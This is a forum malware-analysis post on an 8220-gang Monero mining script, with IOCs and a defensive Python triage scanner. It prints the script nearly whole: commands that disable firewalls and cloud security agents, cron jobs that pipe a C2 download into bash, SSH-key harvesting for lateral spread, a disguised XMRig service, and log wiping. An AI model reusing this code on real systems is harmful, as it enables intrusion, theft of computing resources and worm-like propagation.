[PC Sample Analysis] New 8220 Mining Gang Sample Analysis Report

Hk_Mayfly posted on 2021-11-9 14:51

Preface

While on my team I came across the IOC http://192.210.200.66:1234/xmss; tracing it back showed that it is the mining script of the 8220 mining gang, so I pulled it down for analysis.

Attribution

IP information

IP: 192.210.200.66
Location: Chicago, Illinois, United States
ASN: 36352
Registrar: ColoCrossing
Registered address: Brisbane, Australia
Open ports: 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

Reverse-resolved domains:

apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz

Associated malicious files


Mining script analysis

Since the script is what I obtained first, I will go through each of its functions in turn.

Disable the firewall

setenforce 0 2>/dev/null: the 0 turns the firewall off, and 2>/dev/null sends stderr output to /dev/null.

Performance tuning

  1. Set the maximum number of open files: ulimit -n 65535

  2. Disable the firewall: ufw disable

  3. Allow the malicious network connections through:

    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F

  4. Raise the hugepages limit to improve mining performance: echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. Disable the NMI watchdog: echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

Kill competing miners

netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

Set Google public DNS

if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
  echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
  echo "ok"
fi

Uninstall security services

Uninstall Alibaba Cloud Aegis (Cloud Shield) and the cloud monitoring agent, and block the Aegis IP ranges:

if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor

Uninstall Tencent Cloud YunJing

  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask

Select the download command

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

Scheduled download/update and execution of the script

cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  # check whether crontab already contains the download/update job for the malicious script
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

The cron job is written to the following locations:

/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1

cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}

Harvest user information for propagation

Collects SSH ports, user lists, host lists and login credentials from the host, tries to log in with them, and then downloads and executes the xmss mining script on each target.

localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

Install the mining service

setupxmrservice(){
  echo "
  • Removing previous c3pool miner (if any)"
  if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
  fi
  killall -9 xmrig
  echo "
  • Removing $HOME/c3pool directory"
  rm -rf $HOME/c3pool
  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script
    echo "
  • Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "
  • Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi
    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "
  • Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi
    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "
  • Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi
    if ! type systemctl >/dev/null; then
      echo "
  • Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."
    else
      echo "
  • Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "
  • Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
  fi
}
This is where the mining program (MD5 e5c3720e14a5ea7f678e0a9835d28283) is installed.

Overall flow of the malicious script

# kill Alibaba Cloud Aegis and Tencent Cloud YunJing
der

if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
echo $SPATH

# create the .rsyslogds.sh file, used at the end to start the mining service
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
# the file v holds an MD5, used to verify the MD5 of .rsyslogds
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
# verify the MD5
if [ "$x_md52" = "$x_md51" ]; then
  # if .rsyslogds is not already running, start it
  if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
  fi
else
  # if the MD5 differs, download .rsyslogds from the remote host, kill the fake .rsyslogds and run the genuine one
  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
  pkill .rsyslogds
  /usr/sbin/.rsyslogds
fi
EOL

# create the rsyslogds daemon (systemd unit)
cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL

MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

# check which path is in use; if it is not /usr/sbin there is certainly no .rsyslogds file yet
if [ "$SPATH" = "/usr/sbin" ]
then
  # same idea here, a local check of the MD5 of .rsyslogds; this looks like a typo and should be not-equal
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
  then
    # .rsyslogds MD5 matches: download and run .rsyslogds
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    # start the mining service
    setupxmrservice
    # collect ssh ports, user list, host list and credentials, log in and spread the mining script
    localgo
    # set up the cron job that downloads/updates the script
    cron
  else
    # run the mining program
    $SPATH/.rsyslogds
    # start the service
    setupxmrservice
    # collect ssh ports, user list, host list and credentials, log in and spread the mining script
    localgo
    # set up the cron job that downloads/updates the script
    cron
  fi
else
  # download and run the malicious program .rsyslogds
  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
  # set up the scheduled execution of the script
  cronlow
fi

# the script checks whether .inis is running; if not, it downloads it from the remote host and runs it in the background
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
  cd $SPATH
  nohup ./.inis &
else
  echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history
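The persistence this script leaves behind (the cron jobs in the paths listed above, the oanacroner1 and /etc/init.d/down droppers, the rsyslogds.service unit pointing at a hidden binary, and the .profile and rc.local hooks added by setupxmrservice) can be swept for on a suspect host. The following Python triage check is an added example written for this report, not part of the original post or of the 8220 script; the snapshot dict and the 198.51.100.10 address it uses are constructed for the demonstration.

```python
"""Host triage for the xmss persistence artifacts described in this report.

Works on a snapshot {path: file text} so it can be exercised offline; on a live
host the snapshot would be built by reading the same paths.
"""
import fnmatch
import hashlib
import re

# Files the analysed script drops or installs (names taken from the report).
DROPPED_PATHS = {
    "/etc/cron.hourly/oanacroner1",
    "/etc/init.d/down",
    "/usr/sbin/.rsyslogds",
    "/usr/sbin/.rsyslogds.sh",
    "/usr/sbin/.inis",
    "/tmp/.rsyslogds.sh",
    "/tmp/rsyslogds.service",
    "/etc/systemd/system/rsyslogds.service",
}
# MD5 of the XMRig payload .rsyslogds, from the report's IOC table.
KNOWN_MD5 = {"e5c3720e14a5ea7f678e0a9835d28283"}
# Cron locations the script writes to; the `whoami` ones are per-user, so glob.
CRON_GLOBS = ("/etc/cron.d/*", "/var/spool/cron/*", "/etc/cron.hourly/*")
# The "(curl ... || wget ...) | bash -sh" download-and-execute job.
PIPE_TO_BASH = re.compile(r"\(\s*curl\b.*?\|\|\s*wget\b.*?\)\s*\|\s*bash\b")
# A systemd unit whose ExecStart is a hidden (dot-prefixed) binary.
HIDDEN_EXEC = re.compile(r"^ExecStart=\S*/\.[^\s/]+", re.M)
# Autostart hook that setupxmrservice appends to .profile and rc.local.
AUTOSTART = re.compile(r"\.rsyslogds\.sh")


def scan_snapshot(files):
    """Return sorted (path, rule) pairs for every persistence artifact found."""
    findings = set()
    for path, text in files.items():
        if path in DROPPED_PATHS:
            findings.add((path, "known-dropped-path"))
        if hashlib.md5(text.encode()).hexdigest() in KNOWN_MD5:
            findings.add((path, "known-md5"))
        in_cron = any(fnmatch.fnmatch(path, g) for g in CRON_GLOBS)
        if in_cron and PIPE_TO_BASH.search(text):
            findings.add((path, "cron-pipe-to-bash"))
        if path.endswith(".service") and HIDDEN_EXEC.search(text):
            findings.add((path, "systemd-hidden-execstart"))
        if path.endswith((".profile", "rc.local")) and AUTOSTART.search(text):
            findings.add((path, "autostart-hook"))
    return sorted(findings)


# Constructed sample snapshot modelled on what the analysed script writes;
# 198.51.100.10 (TEST-NET-2) stands in for the C2 host, it is not an indicator.
C2 = "http://198.51.100.10:1234"
JOB = f"(curl -s {C2}/xmss||wget -q -O - {C2}/xmss )|bash -sh"
SAMPLE_SNAPSHOT = {
    "/etc/cron.d/apache": f"30 23 * * * root {JOB}\n##\n",
    "/var/spool/cron/crontabs/root": f"30 23 * * * {JOB}\n##\n",
    "/etc/cron.hourly/oanacroner1": f"{JOB}\n",
    "/etc/systemd/system/rsyslogds.service": (
        "[Unit]\nDescription=rsyslogdservice\n[Service]\n"
        "ExecStart=/usr/sbin/.rsyslogds\nRestart=always\nNice=10\nCPUWeight=1\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/root/.profile": "# ~/.profile\n/usr/sbin/.rsyslogds.sh >/dev/null 2>&1\n",
    # Benign entries that must not trigger.
    "/etc/cron.d/logrotate": "15 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
}

if __name__ == "__main__":
    for path, rule in scan_snapshot(SAMPLE_SNAPSHOT):
        print(f"{rule:26} {path}")
```

Because the script sets chattr +ai on these files, check lsattr and clear the flags before removing anything this finds.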

The .inis file

#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
kill(){
  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}
while true; do
  ipurl="http://agent.apacheorg.top:1234"
  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
  # I suspect this is also a typo and should be not-equal
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
  else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
  fi
  kill
  sleep 1m
done
    

Mining program analysis: .rsyslogds

Basic information

File name: .rsyslogds
MD5: e5c3720e14a5ea7f678e0a9835d28283
SHA256: 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
File type: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
File size: 2077172 bytes
Other: UPX packed

Program analysis

After UPX unpacking, opening the binary shows that it is simply a build of the off-the-shelf XMRig mining project, version 6.7.1, compiled on 2021/01/12.

Extracted wallet address: 48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

IOC information

MD5
e5c3720e14a5ea7f678e0a9835d28283
51cf7dde4003aa6901918e373bf91b18
01972190a83b183b56064d82045de8d6
caa9ea2c522fc6268c7e976142d48775

IP
205.185.113.151
194.156.99.30
5.196.247.12
205.185.116.78
192.210.200.66

Domain
bash.givemexyz.xyz
bash.givemexyz.in
agent.apacheorg.top

URL
http://192.210.200.66:1234/xmss
http://192.210.200.66:1234/v
http://192.210.200.66:1234/.rsyslogds
http://192.210.200.66:1234/.inis
http://205.185.113.59:1234/xmss
http://205.185.113.59:1234/v
http://205.185.113.59:1234/.rsyslogds
http://205.185.113.59:1234/.inis
http://agent.apacheorg.top:1234/v
http://agent.apacheorg.top:1234/xmss
http://agent.apacheorg.top:1234/.rsyslogds
http://agent.apacheorg.top:1234/.inis

Wallet address
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF


zich123 posted on 2021-11-9 15:37
The Monero wallet address, the most important thing in this script, is actually one character short...

此ID不存在 posted on 2021-11-9 15:11
Last edited by 此ID不存在 on 2021-11-9 17:46

Kaspersky flags this page as malicious:
事件: 检测到恶意对象
用户: LAPTOP-UOAGND7N\ThinkPad
用户类型: 活动用户
应用程序名称: msedge.exe
应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
组件: 网页反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan-Downloader.Shell.Miner.gen
精确度: 不确切
威胁级别: 高
对象类型: 文件
对象名称: thread-1540889-1-1.html
对象路径: https://www.52pojie.cn
MD5: 9D1AE8F86D163B6E42408B3C5E5EE7BF
原因: 专家分析
数据库发布日期: 昨天,2021/11/8 23:37:00



After allowing it, a threat detection is reported:

事件: 检测到恶意对象
用户: LAPTOP-UOAGND7N\ThinkPad
用户类型: 活动用户
应用程序名称: msedge.exe
应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan-Downloader.Shell.Miner.gen
